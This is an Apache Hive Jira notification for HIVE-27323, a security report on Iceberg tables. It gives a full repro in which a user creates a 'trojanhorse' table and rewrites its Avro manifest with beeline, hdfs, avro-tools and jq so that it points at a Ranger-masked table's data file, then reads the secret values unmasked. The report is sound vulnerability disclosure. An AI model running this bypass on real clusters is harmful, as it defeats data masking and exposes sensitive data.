[ https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Denys Kuzmenko updated HIVE-27323: ---------------------------------- Issue Type: Improvement (was: Bug) > Iceberg: malformed manifest file or list can cause data breach > -------------------------------------------------------------- > > Key: HIVE-27323 > URL: https://issues.apache.org/jira/browse/HIVE-27323 > Project: Hive > Issue Type: Improvement > Components: Iceberg integration > Affects Versions: 4.0.0-alpha-2 > Reporter: Janos Kovacs > Priority: Blocker > Labels: check, pull-request-available > > Set to bug/blocker instead of enhancement due to its security related nature, > Hive4 should not be released w/o fix for this. Please reset if needed. > > Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals > and can't just be fixed via the storagehandler authorizer. > > Context: > * There are some core tables with sensitive data that users can only query > with data masking enforced (e.g. via Ranger). Let's assume this is the > `default.icebergsecured` table. > * An end-user can only access the masked form of the sensitive data as > expected... > * The users also have privilege to create new tables in their own sandbox > databases - let's assume this is the `default.trojanhorse` table for now. > * The user can create a malicious table that exposes the sensitive data > non-masked leading to a possible data breach. > * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user > direct file-system access needs > Repro: > * First make sure the data is secured by the masking policy: > {noformat} > <kinit as privileged user> > beeline -e " > DROP TABLE IF EXISTS default.icebergsecured PURGE; > CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) > STORED BY ICEBERG; > INSERT INTO default.icebergsecured VALUES ('You might be allowed to see > this.','You are NOT allowed to see this!'); > " > <kinit as end user> > beeline -e " > SELECT * FROM default.icebergsecured; > " > +------------------------------------+--------------------------------+ > | icebergsecured.txt | icebergsecured.secret | > +------------------------------------+--------------------------------+ > | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY | > +------------------------------------+--------------------------------+ > {noformat} > * Now let the user to create the malicious table exposing the sensitive data: > {noformat} > <kinit as end user> > beeline -e " > DROP TABLE IF EXISTS default.trojanhorseviadata; > CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) > STORED BY ICEBERG > LOCATION '/some-user-writeable-location/trojanhorseviadata'; > INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder'); > " > SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline --outputformat=csv2 --showHeader=false --verbose=false > --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM > default.icebergsecured.files;" 2>/dev/null) > TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null > |grep metadata_location |grep -v previous_metadata_location | awk '{print > $5}') > TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep > "manifest-list" |cut -f4 -d\") > hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION > TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION) > TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq > '.manifest_path' |tr -d \") > hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION > TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION) > mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig > avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp > "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json > avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > > ${TROJAN_MANIFESTFILE}.schema > avro-tools fromjson --codec deflate --schema-file > ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > > ${TROJAN_MANIFESTFILE}.new > hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION > beeline -e "SELECT * FROM default.trojanhorseviadata;" > +------------------------------------+-----------------------------------+ > | trojanhorseviadata.txt | trojanhorseviadata.secret | > +------------------------------------+-----------------------------------+ > | You might be allowed to see this. | You are not allowed to see this! | > +------------------------------------+-----------------------------------+ > {noformat} > > There are actually multiple options to create such table and modify the > manifest/list like reuse parts of the iceberg code or just use spark which > needs direct end-user write access to the file-system, etc. -- This message was sent by Atlassian Jira (v8.20.10#820010)